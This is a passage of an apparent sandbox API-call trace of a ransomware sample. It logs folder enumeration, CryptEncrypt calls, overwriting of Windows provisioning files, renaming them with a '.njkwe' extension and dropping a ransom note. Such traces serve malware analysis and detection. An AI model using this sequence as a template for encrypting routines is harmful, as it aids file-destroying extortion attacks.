(normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.556] GetTickCount () returned 0x1152fd6 [0074.556] GetTickCount () returned 0x1152fd6 [0074.556] GetTickCount () returned 0x1152fd6 [0074.556] GetTickCount () returned 0x1152fd6 [0074.556] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.556] GetProcessHeap () returned 0xbe0000 [0074.556] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.556] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.557] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.557] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.557] GetProcessHeap () returned 0xbe0000 [0074.557] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.557] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.557] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.558] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.558] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.558] CloseHandle (hObject=0x434) returned 1 [0074.558] GetProcessHeap () returned 0xbe0000 [0074.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.558] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0074.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.559] GetProcessHeap () returned 0xbe0000 [0074.559] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.559] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0074.559] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0074.559] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0074.559] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0074.559] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0074.559] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0074.559] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov") returned 85 [0074.559] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0074.559] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0074.559] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.559] GetProcessHeap () returned 0xbe0000 [0074.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.559] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\*") returned 87 [0074.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0074.560] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.560] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.560] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.560] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.560] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.560] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\.") returned 87 [0074.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.560] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.560] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.560] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.560] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.560] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.561] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.561] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\..") returned 88 [0074.561] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.561] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.561] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0074.561] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0074.561] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0074.561] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0074.561] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0074.561] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0074.561] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime") returned 93 [0074.561] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0074.561] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0074.561] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.561] GetProcessHeap () returned 0xbe0000 [0074.561] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.561] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\*") returned 95 [0074.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0074.561] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.561] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.561] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.561] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.561] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.561] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\.") returned 95 [0074.561] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.561] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d26a2f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.561] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.561] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.562] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.562] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.562] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.562] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\..") returned 96 [0074.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.562] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53dc2e6f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53dc2e6f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53de90cb, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x3a7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0074.562] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0074.562] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0074.562] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0074.562] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0074.562] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0074.562] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0074.562] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0074.562] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.562] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0074.562] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.562] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0074.562] GetTickCount () returned 0x1152fe6 [0074.562] GetTickCount () returned 0x1152fe6 [0074.562] GetTickCount () returned 0x1152fe6 [0074.562] GetTickCount () returned 0x1152fe6 [0074.562] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0074.562] GetProcessHeap () returned 0xbe0000 [0074.562] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0074.562] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x3a7, lpOverlapped=0x0) returned 1 [0074.564] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.564] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x3a7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x3a7, lpOverlapped=0x0) returned 1 [0074.564] GetProcessHeap () returned 0xbe0000 [0074.564] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0074.564] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.564] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0074.565] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0074.565] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0074.565] CloseHandle (hObject=0x43c) returned 1 [0074.565] GetProcessHeap () returned 0xbe0000 [0074.565] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0074.565] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0074.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0074.565] GetProcessHeap () returned 0xbe0000 [0074.565] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0074.565] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53dc2e6f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53dc2e6f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53de90cb, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x3a7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 0 [0074.565] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0074.565] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0074.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.566] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0074.567] CloseHandle (hObject=0x438) returned 1 [0074.567] GetProcessHeap () returned 0xbe0000 [0074.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.567] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53de90cb, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53de90cb, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53de90cb, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1ac, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0074.567] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0074.567] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0074.568] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0074.568] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0074.568] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0074.568] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml") returned 97 [0074.568] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0074.568] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.568] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0074.568] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.568] GetTickCount () returned 0x1152fe6 [0074.568] GetTickCount () returned 0x1152fe6 [0074.568] GetTickCount () returned 0x1152fe6 [0074.568] GetTickCount () returned 0x1152fe6 [0074.568] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0074.568] GetProcessHeap () returned 0xbe0000 [0074.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0074.568] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x1ac, lpOverlapped=0x0) returned 1 [0074.569] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffe54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.570] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x1ac, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x1ac, lpOverlapped=0x0) returned 1 [0074.570] GetProcessHeap () returned 0xbe0000 [0074.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0074.570] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.570] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0074.706] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0075.337] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0075.337] CloseHandle (hObject=0x438) returned 1 [0075.338] GetProcessHeap () returned 0xbe0000 [0075.338] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.338] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0075.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" 